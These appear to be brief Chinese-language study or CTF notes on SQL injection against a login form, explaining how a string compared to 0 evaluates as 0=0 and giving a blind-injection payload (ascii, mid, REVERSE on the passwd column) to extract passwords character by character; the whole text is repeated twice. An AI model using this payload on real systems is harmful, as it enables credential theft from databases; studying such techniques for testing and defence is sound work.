构造select * from * where uname = $_POST[uname]
uname=admin’-’
此时uname=-1,不行
$sql = select * from users where username=$username;
在字符串username的值和数字0比较的时候,字符串变为了0
故此0=0
payload:admin’-(ascii(mid(REVERSE(MID((passwd)from(-%d)))from(-1))
构造select * from * where uname = $_POST[uname]
uname=admin’-’
此时uname=-1,不行
$sql = select * from users where username=$username;
在字符串username的值和数字0比较的时候,字符串变为了0
故此0=0
payload:admin’-(ascii(mid(REVERSE(MID((passwd)from(-%d)))from(-1))